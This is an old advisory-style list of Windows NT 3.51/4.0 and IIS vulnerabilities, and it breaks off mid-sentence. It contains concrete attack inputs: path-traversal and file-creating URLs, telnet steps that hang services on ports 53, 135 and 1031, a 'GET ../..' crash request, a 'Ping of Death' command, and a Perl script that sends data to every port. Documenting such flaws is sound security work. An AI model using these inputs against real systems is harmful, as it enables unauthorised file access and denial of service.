受影响系统:4.0,iis 1.0
A URL such as 'http://www.domain.com/..\..' allows you to browse and download files outside of the webserver content root directory.
A URL such as 'http://www.domain.com/scripts..\..\scriptname' allows you to execute the target script.
By default user 'Guest' or IUSR_WWW has read access to all files on an NT disk. These files can be browsed, executed or downloaded by wandering guests.
--------------------------------------------------------------------
受影响系统:4.0
A URL such as http://www.domain.com/scripts/exploit.bat>PATH\target.bat will create a file 'target.bat''.
If the file 'target.bat' exists, the file will be truncated.
A URL such as http://www.domain.com/scripts/script_name%0A%0D>PATH\target.bat will create an output file 'target.bat''.
----------------------------------------------------------------------
受影响系统:3.51,4.0
Multiple service ports (53, 135, 1031) are vunerable to 'confusion'.
The following steps;
Telnet to an NT 4.0 system on port 135
Type about 10 characters followed by a
1<cr>
2Exit Telnet
3results in a target host CPU utilization of 100%, though at a lower priority than the desktop shell. Multiple services which are confused can result in a locked system.
4
5When launched against port 135, NT Task manager on the target host shows RPCSS.EXE using more than usual process time. To clear this the system must be rebooted.
6
7The above also works on port 1031 (inetinfo.exe) where IIS services must be restarted.
8
9If a DNS server is running on the system, this attack against port 53 (dns.exe) will cause DNS to stop functioning.
10
11The following is modified perl script gleaned from postings in the [email protected] list to test ports on your system (Perl is available from the NT resource kit):
12
13/*begin poke code*/
14
15use Socket;
16use FileHandle;
17require "chat2.pl";
18
19$systemname = $ARGV[0] && shift;
20
21$verbose = 1; # tell me what you're hitting
22$knownports = 1; # don't hit known problem ports
23for ($port = $0; $port<65535; $port++)
24{
25
26
27if ($knownports && ($port == 53 || $port == 135 || $port== 1031)) {
28next;
29}
30$fh = chat::open_port($systemname, $port);
31chat::print ($fh,"This is about ten characters or more");
32if ($verbose) {
33print "Trying port: $port\n";
34}
35chat::close($fh);
36
37}
38
39
40/*end poke code*/
41
42Save the above text as c:\perl\bin\poke, run like this: C:\perl\bin> perl poke servername
43
44\--------------------------------------------------------------------------------
45
46受影响系统:4.0
47Using a telnet application to get to a webserver via HTTP port 80, and typing "GET ../.." <cr> will crash IIS.
48
49This attack causes Dr. Watson to display an alert window and to log an error:
50
51"The application, exe\inetinfo.dbg, generated an application error The error occurred on date@ time The exception generated was c0000005 at address 53984655 (TCP_AUTHENT::TCP_AUTHENT"
52
53\--------------------------------------------------------------------------------
54
55受影响系统:3.51,4.0
56Large packet pings (PING -l 65527 -s 1 hostname) otherwise known as 'Ping of Death' can cause a blue screen of death on 3.51 systems:
57
58STOP: 0X0000001E
59KMODE_EXCEPTION_NOT_HANDLED - TCPIP.SYS
60
61-OR-
62
63STOP: 0x0000000A
64IRQL_NOT_LESS_OR_EQUAL - TCPIP.SYS
65
66NT 4.0 is vunerable sending large packets, but does not crash on receiving large packets.
67
68\--------------------------------------------------------------------------------
69
70Microsoft IIS 5.0 has problems handling a specific form of URL ending with "ida". The problem can have 2 kinds of results. One possible outcome is that the server responds with a message like "URL String too long"; "Cannot find the specified path" or the like. The other possible result is that the server terminates with an "Access</cr></cr>